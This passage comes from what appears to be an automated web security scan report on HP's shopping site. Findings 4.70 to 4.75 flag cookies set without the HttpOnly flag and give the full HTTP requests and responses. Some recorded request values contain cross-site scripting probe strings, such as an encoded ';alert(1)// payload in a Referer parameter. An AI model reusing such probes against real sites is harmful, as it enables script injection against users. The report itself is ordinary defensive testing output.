GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:34 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 402159


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.70. http://www.shopping.hp.com/webapp/shopping/home.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/home.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hp.com/country/us/en/cs/media/swf/homepage_carousel.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; EMID=; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; s_depth=1; lang=en-us; cc=us; s_cc=true; s_sq=%5B%5BB%5D%5D; h_cm2=cs%3Aus_en_home_message_l1_hho_fixed_shopnow_flashlink

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:29 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrit2T3wh5OijqulLZdgKXmiaumQ%3D%3D; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 148762

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_head
...[SNIP]...

4.71. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/mpss_portal.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/mpss_portal.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; hpcompc_usen=cartExists=true; EMID=; s_depth=19; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; 
s_cc=true; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS_HP_CLICKS=4x17x11042; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fmpss_portal.do_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CArticle%25257CHP%252520CoolSense%252520Technology%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fcache%25252F596786-0-0-225-121.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:26 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:27 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 140544

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<style type="text/css">
.NewMpss{float
...[SNIP]...

4.72. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_advisor.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/product_advisor.do?landing=desktops&storeName=computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=24; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%5D; 
ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11190; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fseries_can.do%25253FstoreName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-One%25252BPCs%252526jumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252FAll-in-One_PCs%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fproduct_advisor.do%25253Flanding%25253Ddesktops%252526storeName%25253Dcomputer_st%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:56 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 166238

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html lang="en">
<head>
<style ty
...[SNIP]...

4.73. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342102'%5D%2C%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374381'%5D%5D; ljumpstack=%5B%5B're_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1'%2C'1316672374382'%5D%5D; hpshopping=1&user_id=mlkpgtuW3gh8MCnpuVDWeQyYm2vi&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb9e8a695fbc9b6831d&cart_id=1603777709; hpcompc_usen=cartExists=true; EMID=; s_depth=28; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Apdp%3Adesktops%3Arts_desktops%3Ahp%20pavilion%20p7-1020%20desktop%20pc; s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Apdp%25253Adesktops%25253Arts_desktops%25253Ahp%252520pavilion%252520p7-1020%252520desktop%252520pc%2526pidt%253D1%2526oid%253DSimilar%252520priced%252520items%2526oidt%253D3%2526ot%253DSUBMIT%26hphqhhomktg%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.hp.com%25252Funited-states%25252Fconsumer%25252Fdigital_photography%25252Fbuying_guides%25252Faio.html%25253Fjumpid_t%25253Dreg_R1002_USEN%2526oid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fwebapp%25252Fshopping%25252Fstore_access.do%25253Fproduct_code%25253DCN731A%25252523B1H%252526template_type%25253Dp%2526ot%253DA

PROD_LIST=QP767AA%23ABA%7CBV704AA%23ABA&landing=desktops&category=p7xt_series&lanAttr=&subcat1=rts&storeName=computer_store&compare=Similar+priced+items

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:28:53 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:28:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 284317


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!--
...[SNIP]...

4.74. http://www.shopping.hp.com/webapp/shopping/product_detail.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_detail.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData= HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON; HP_EBUS_HP_CLICKS=4x16x6397

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=qJLfT6LXLYvgcqqLnkGNhMTmz0mT0SmVfp197Ly3QVFjGKSpllSy!-1039217636; expires=Friday, 23-Sep-2011 01:10:47 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:10:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224370

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...

4.75. http://www.shopping.hp.com/webapp/shopping/search_request.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/search_request.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

